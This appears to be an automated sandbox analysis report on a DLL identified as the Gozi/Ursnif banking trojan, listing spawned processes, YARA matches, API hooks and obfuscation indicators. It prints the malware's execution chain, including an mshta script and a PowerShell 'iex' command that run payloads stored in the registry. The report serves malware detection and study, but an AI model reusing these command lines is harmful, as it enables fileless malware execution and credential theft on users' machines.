Source: 00000027.00000002.477760036.000000000089E000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: crypt_3300.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.bank.troj.spyw.evad.winDLL@34/149@17/2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A5A7B1 CloseHandle,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle, 1_2_00A5A7B1
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{66431C9B-5D28-11EB-90E5-ECF4BB570DC9}.dat Jump to behavior
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{02250638-79A0-844F-1356-BDF8F7EA41AC}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{42812DF2-B9CF-C435-5396-FD38372A81EC}
Source: C:\Windows\SysWOW64\regsvr32.exe Mutant created: \Sessions\1\BaseNamedObjects\{FE1EA41C-45BA-E0E6-BF12-491463668D88}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5256:120:WilError_01
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\~DF556AB8A7952C322B.TMP Jump to behavior
Source: crypt_3300.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: crypt_3300.dll Virustotal: Detection: 7%
Source: regsvr32.exe String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\crypt_3300.dll'
Source: unknown Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\crypt_3300.dll
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1460 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1460 CREDAT:82962 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1460 CREDAT:17422 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1460 CREDAT:17428 /prefetch:2
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\czjkgrnh\czjkgrnh.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3F68.tmp' 'c:\Users\user\AppData\Local\Temp\czjkgrnh\CSCEF1F6125AF8B42719A491BF8DBE92E8.TMP'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rgcvdt5c\rgcvdt5c.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES515A.tmp' 'c:\Users\user\AppData\Local\Temp\rgcvdt5c\CSC108898B256644579B55FCCE99117812A.TMP'
Source: unknown Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\crypt_3300.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe' Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1460 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1460 CREDAT:82962 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1460 CREDAT:17422 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1460 CREDAT:17428 /prefetch:2 Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\czjkgrnh\czjkgrnh.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rgcvdt5c\rgcvdt5c.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3F68.tmp' 'c:\Users\user\AppData\Local\Temp\czjkgrnh\CSCEF1F6125AF8B42719A491BF8DBE92E8.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES515A.tmp' 'c:\Users\user\AppData\Local\Temp\rgcvdt5c\CSC108898B256644579B55FCCE99117812A.TMP'
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\System32\control.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: C:\Windows\explorer.exe File opened: C:\Windows\SYSTEM32\msftedit.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Source: crypt_3300.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: crypt_3300.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: crypt_3300.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: crypt_3300.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: crypt_3300.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: crypt_3300.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: crypt_3300.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000021.00000002.440428591.000001FC308B0000.00000002.00000001.sdmp, csc.exe, 00000024.00000002.449984223.00000241EFD80000.00000002.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000026.00000000.477442156.000000000E420000.00000002.00000001.sdmp
Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000001.00000003.463267415.00000000057E0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000001.00000003.463267415.00000000057E0000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000026.00000000.477442156.000000000E420000.00000002.00000001.sdmp
Source: crypt_3300.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: crypt_3300.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: crypt_3300.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: crypt_3300.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: crypt_3300.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

barindex
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Compiles C# or VB.Net code
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\czjkgrnh\czjkgrnh.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rgcvdt5c\rgcvdt5c.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\czjkgrnh\czjkgrnh.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rgcvdt5c\rgcvdt5c.cmdline'
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A6FC77 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey, 1_2_00A6FC77
Registers a DLL
Source: unknown Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\crypt_3300.dll
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A77177 push ecx; ret 1_2_00A77187
Source: C:\Windows\explorer.exe Code function: 38_2_03B7C131 push 3B000001h; retf 38_2_03B7C136
Source: C:\Windows\System32\control.exe Code function: 39_2_0088C131 push 3B000001h; retf 39_2_0088C136
Source: initial sample Static PE information: section name: .text entropy: 7.02169145494

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\rgcvdt5c\rgcvdt5c.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\czjkgrnh\czjkgrnh.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.362515361.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.475600162.0000000000A50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362460411.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.456841690.0000000000470000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362409571.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.398940574.0000000004C6B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000003.464100297.000002179E910000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.473286008.0000000002AD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.629508039.000000000679E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362501622.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362480640.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362433705.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362526268.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.454805795.000002746FF10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.622819473.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362379436.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.477760036.000000000089E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5292, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 5720, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFA9B33521C
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFA9B335200
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\SysWOW64\regsvr32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
